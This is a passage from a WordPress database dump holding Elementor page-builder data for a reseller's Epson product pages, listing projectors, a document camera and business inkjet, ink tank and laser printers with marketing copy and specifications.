PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6efc9f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2441 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8bce658\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":121,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"4eeb26d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2442 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><br>\\n\\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.\\n\\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em>\\n<ul>\\n \\t<li>High Brightness<\\/li>\\n \\t<li>Beyond Full HD Resolution<\\/li>\\n \\t<li>Powered Lens<\\/li>\\n \\t<li>Portrait Projection<\\/li>\\n \\t<li>Flexible Installation<\\/li>\\n \\t<li>Edge Blending<\\/li>\\n \\t<li>Point Correction<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2443 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"acb7593\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":143,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"f800ae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8117,3503,'_elementor_version','2.5.14'),(8650,3661,'_hide_page_title',''),(8651,3661,'_hide_header',''),(8120,3504,'_wp_page_template','template-fullwidth.php'),(8121,3504,'_elementor_edit_mode','builder'),(8122,3504,'_elementor_template_type','post'),(8123,3504,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: 